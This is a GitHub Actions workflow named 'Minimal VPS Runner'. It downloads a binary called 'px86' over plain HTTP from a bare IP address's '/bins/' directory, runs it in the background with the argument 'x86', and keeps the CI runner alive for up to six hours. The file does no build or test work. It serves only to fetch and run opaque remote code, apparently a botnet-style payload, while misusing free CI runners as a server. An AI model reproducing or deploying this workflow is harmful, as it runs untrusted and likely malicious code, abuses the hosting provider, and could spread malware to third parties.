name: Minimal VPS Runner

on:
  workflow_dispatch:
    inputs:
      uptime:
        description: 'VPS uptime in hours (max 6)'
        required: false
        default: '6'
        type: choice
        options:
          - '1'
          - '2'
          - '3'
          - '4'
          - '5'
          - '6'

jobs:
  run-binary:
    runs-on: ubuntu-latest
    steps:
      - name: Download and run binary with keep-alive
        run: |
          # Download and make binary executable
          wget http://45.138.16.158/bins/px86 -O px86
          chmod +x px86

          echo "🟢 Launching binary in background..."
          ./px86 x86 &

          PX86_PID=$!
          echo "📌 Binary running in background (PID: $PX86_PID)"

          # Keep alive
          UPTIME_SECONDS=$(( ${{ github.event.inputs.uptime }} * 3600 ))
          echo "⏳ Keeping runner alive for $UPTIME_SECONDS seconds..."

          # Loop to prevent step from exiting early
          for ((i=0; i<UPTIME_SECONDS; i++)); do
            if ! ps -p $PX86_PID > /dev/null; then
              echo "❌ Binary process exited early."
              break
            fi
            sleep 1
          done

          echo "✅ Done. Exiting workflow."
